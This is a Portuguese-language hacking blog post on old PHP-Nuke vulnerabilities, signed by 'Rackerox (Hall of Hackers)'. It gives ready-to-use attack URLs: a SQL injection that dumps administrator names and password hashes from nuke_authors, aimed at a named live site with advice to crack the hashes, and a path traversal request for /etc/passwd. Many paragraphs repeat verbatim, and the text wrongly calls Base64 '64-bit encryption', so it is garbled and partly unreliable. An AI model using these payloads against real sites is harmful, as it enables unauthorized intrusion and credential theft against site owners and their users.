Primeiro vamos ver o que é Nuke-PHP.
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso, principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.
Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários . Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.
O PHP-Nuke é um software gratuito criado pelo venezuelano Francisco Burzi, baseado na linguagem PHP. Devido à facilidade de uso, principalmente para publicação de notícias, tornou-se bastante popular e foi adotado por inúmeros sites.
Ele é um pacote de software que permite administrar portais , realizando tarefas como atualizações de notícias e manutenção de usuários . Muito útil para os usuários de PHP Atualmente milhares de sites rodam o software PHP-Nuke.
Principais falhas:
Falha 1
-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits considerado pouco seguro.
O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de preferencia o IE)
Falha 2
-erro no arquivo "opendir.php"
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)
Falha 1
-A senha de administração do PHP-Nuke é guardada em um cookie e codificada em Base64, um método de criptografia de 64 bits considerado pouco seguro.
O ataque aos servidores pode ser feito atraves de códigos HTTP (isto significa que voce pode injetar os códigos no proprio navegador, de preferencia o IE)
Falha 2
-erro no arquivo "opendir.php"
(...)
$REQUEST_URI = strip_tags($REQUEST_URI);
$res = explode("$PHP_SELF?", $REQUEST_URI);
$odp_cat = $res[1];
if (substr($odp_cat,0,1) == "/") $odp_cat = substr($odp_cat,1);
(define $requesturl)
(...)
Pratica 1 :
Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.
Vamos visualizar senhas criptografadas do aministrador e usuarios on line no site usando um codigo exploit.
código:
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
injection pronto:
http://www.abaga.com.br/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
http://www.abaga.com.br/modules.php?name=Web_Links&l_op=viewlinkeditorial&lid=-1%20%20UNION%20SELECT%20name,1,pwd,aid%20FROM%20nuke_authors
obseve as senhas criptografadas, basta um decripter.
----------
pratica 2 :
Na segunda falha podemos usar o operdir.php
Inocente demais operdir(abrir diretorio)
basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Inocente demais operdir(abrir diretorio)
basta um pouquinho de conhecimento de UNIX que da para abrir o que quiser dentro no servidor.
Eu não vou colocar nenhum site aqui não =), mas um exemplo de exploit para localizar senhas fica assim:
http://www.sitecobaia.com.br/opendir.php?requesturl=/etc/passwd
http://www.sitecobaia.com.br/opendir.php?requesturl=/etc/passwd
--------------------------
Este tipo de falha NÃO é uma coisa recente, faz muito tempo que existe, as ultimas versões do NUKE-PHP nem contem mais falhas conhecidas.
Mas muita gente no passado instalou o nuke-PHP em seu site, o site funciona corretamente e por isto não são todos que atualizaram, e esquecem que atualização não corrige apenas erros de desempenho, mas de segurança também.
Links:
Para quem não conhece o Nuke-PHP
Mas muita gente no passado instalou o nuke-PHP em seu site, o site funciona corretamente e por isto não são todos que atualizaram, e esquecem que atualização não corrige apenas erros de desempenho, mas de segurança também.
Links:
Para quem não conhece o Nuke-PHP
http://phpnuke.org/
Para quem quer estudar mais sobre o opendir.php
http://www.ewebsite.biz/modules.php?name=PHP_Manual&page=function.opendir.html
Para quem quer estudar mais sobre o opendir.php
http://www.ewebsite.biz/modules.php?name=PHP_Manual&page=function.opendir.html
----------------------------
By Rackerox (Hall of Hackers)
Nenhum comentário:
Postar um comentário